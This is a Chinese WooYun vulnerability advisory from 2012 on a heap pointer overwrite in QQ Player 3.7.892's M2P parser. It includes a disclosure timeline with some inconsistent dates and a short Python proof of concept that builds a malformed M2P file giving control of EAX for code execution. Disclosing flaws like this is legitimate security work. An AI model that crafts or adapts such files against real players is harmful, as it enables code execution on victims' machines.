当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013408

漏洞标题:QQ影音3.7.892 m2p文件解析堆指针覆盖漏洞

相关厂商:腾讯影音

漏洞作者: 路人甲

提交时间:2012-10-16 16:23

修复时间:2012-11-30 16:24

公开时间:2012-11-30 16:24

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-16: 细节已通知厂商并且等待厂商处理中
2012-10-20: 厂商已经确认,细节仅向厂商公开
2012-10-23: 细节向第三方安全合作伙伴开放
2012-12-14: 细节向核心白帽子及相关领域专家公开
2012-12-24: 细节向普通白帽子公开
2013-01-03: 细节向实习白帽子公开
2012-11-30: 细节向公众公开

简要描述:

QQ影音最新版(3.7.892)解析M2P文件时存在一处堆指针覆盖漏洞,可以导致播放M2P文件时执行任意代码

详细说明:

QQ影音最新版(3.7.892)解析M2P文件时存在一处堆指针覆盖漏洞,可以导致播放M2P文件时执行任意代码
详见测试代码,已在XP上测试通过

漏洞证明:

l = 3315716 * "A"
s1 = ((0,'\x00\x00\x01\xba'), (2048, '\x00\x00\x01\xba'),
(3289120, '\x00\x00\x01\xe0\x07'), (3289273, '\x00\x00\x01\xb3'),
(3289283, '\xba'), (3289452, '\x42\x42\x42\x42'),
(3289468, '\x00\x00\x01\x00'), (3290359, '\x00\x00\x01\x00'),
(3301408, '\x00\x00\x01\xe0\x07'), (3303112, '\x00\x00\x01\x00'))
# EAX overwrite(3289452, '\x42\x42\x42\x42') call eax+0x24

o = open("c:\\poc.m2p","wb")
o.write(l)

for i in range(len(s1)):
o.seek(s1[i][0], 0)
o.write(s1[i][1])

o.close()


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-10-20 18:47

厂商回复:

CNCERT确认漏洞情况,对于exp正对多版本进行确认。先行确认,待进一步联系腾讯公司(近期处置的漏洞事件较多,该事件暂延后)。
按远程攻击,完全影响机密性、完整性、可用性进行评分,rank=10*1.3*1.5=19.5

最新状态:

暂无